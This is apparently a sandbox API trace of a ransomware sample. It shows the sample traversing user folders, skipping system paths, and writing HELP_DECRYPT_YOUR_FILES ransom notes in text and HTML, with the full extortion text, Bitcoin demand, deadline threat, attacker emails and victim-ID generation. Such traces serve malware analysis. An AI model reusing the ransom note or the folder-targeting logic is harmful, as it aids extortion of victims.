	[0180.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.047] StrStrW (lpFirst="c:\\users\\default\\pictures\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.047] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.047] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.047] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.047] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\"
	[0180.147] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.147] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.147] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.147] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x35 | out: lpsz="c:\\users\\default\\pictures\\help_decrypt_your_files.txt") returned 0x35
	[0180.147] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.148] StrStrW (lpFirst="c:\\users\\default\\pictures\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.148] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.148] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.148] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.149] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures"
	[0180.149] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*"
	[0180.149] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.149] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.149] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.149] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.152] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.152] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.155] CloseHandle (hObject=0x380) returned 1
	[0180.155] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.156] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.159] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.159] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.160] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.160] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.160] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.160] CloseHandle (hObject=0x380) returned 1
	[0180.161] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.161] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.161] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.161] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.161] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.164] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.164] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.166] CloseHandle (hObject=0x380) returned 1
	[0180.167] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.167] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.168] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.169] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.169] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.169] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.169] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.169] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.169] CloseHandle (hObject=0x380) returned 1
	[0180.170] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*" (normalized: "c:\\users\\default\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84a57326, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.170] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\*.*") returned 29
	[0180.170] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.170] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Pictures\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\default\\pictures\\*.*") returned 0x1d
	[0180.170] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.171] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0180.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.171] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0180.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.171] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.172] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.172] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0180.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.172] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0180.173] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.174] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.174] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.174] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0180.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.175] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.175] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.175] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0180.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.176] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.176] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.176] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.177] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.177] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0180.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.177] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="cookies") returned 0x0
	[0180.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.177] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0180.178] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.178] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.178] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x84a57326, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.178] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.178] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a57326, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a57326, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.178] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.178] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.178] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.179] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.179] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1
	[0180.179] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1
	[0180.179] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1
	[0180.179] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.179] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.180] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood"
	[0180.180] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood"
	[0180.180] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\"
	[0180.180] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\PrintHood\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\"
	[0180.180] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*"
	[0180.180] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*.*" (normalized: "c:\\users\\default\\printhood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a30fc8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a30fc8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84eaa5de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.180] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.181] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood"
	[0180.181] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*.*") returned="C:\\Users\\Default\\PrintHood\\*.*"
	[0180.181] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.181] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.181] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0180.181] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\printhood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.182] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.182] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.185] CloseHandle (hObject=0x380) returned 1
	[0180.186] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.186] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.187] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.187] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\printhood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.188] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.194] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.194] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.195] CloseHandle (hObject=0x380) returned 1
	[0180.195] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.195] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.195] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.195] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0180.196] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\printhood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
